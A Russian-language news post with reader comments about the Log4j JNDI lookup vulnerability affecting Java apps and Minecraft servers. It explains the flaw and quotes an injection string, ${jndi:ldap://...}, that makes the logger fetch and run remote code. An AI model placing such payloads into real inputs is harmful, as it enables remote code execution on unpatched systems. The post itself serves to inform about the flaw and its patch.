Уязвимость в библиотеке Log4j угрожает многим приложениям на Java

Пользовательские серверы Minecraft в панике. Как пишут, достаточно лишь отправить сообщение в чат, чтобы выполнить вредоносный код.

Обычно от логировщика требуется одно: получить строку и отправить в соответствии с предоставленными конфигурациями. Но Log4j проверяет входные данные и резолвит их.

Как пример, на Хакерньюз приводят такое:

Logging from ${java:vm} // на выходе будет Logging from Oracle JVM

Если как аргумент скормить что-то такое:

${jndi:ldap://someremoteclass}

то с удалённого сервера можно подгрузить класс и динамически исполнить вредоносный код.

Как пример уязвимости — http сервер, который логирует строку, скажем, user agent.

Конкретно для Minecraft вышел официальный патч 1.18.1, который закрывает уязвимость, но множество пользовательских серверов всё ещё подвержены этому.

115115
112 комментария

Пользовательские серверы Minecraft в панике. Как пишут, достаточно лишь...<ЧИТАТЬ ПРОДОЛЖЕНИЕ В ИСТОЧНИКЕ>

122
Ответить

надо было на превью ставить классический крик школьника после удаления дома

43
Ответить

Есть кое-что получше.
https://youtu.be/_kME6JH-eaw

5
Ответить

Комментарий недоступен

Ответить

Комментарий недоступен

19
Ответить

Старнно, что заметили только сейчас, выглядит как что-то очевидное

12
Ответить

Я заметил ещё вчера )

10
Ответить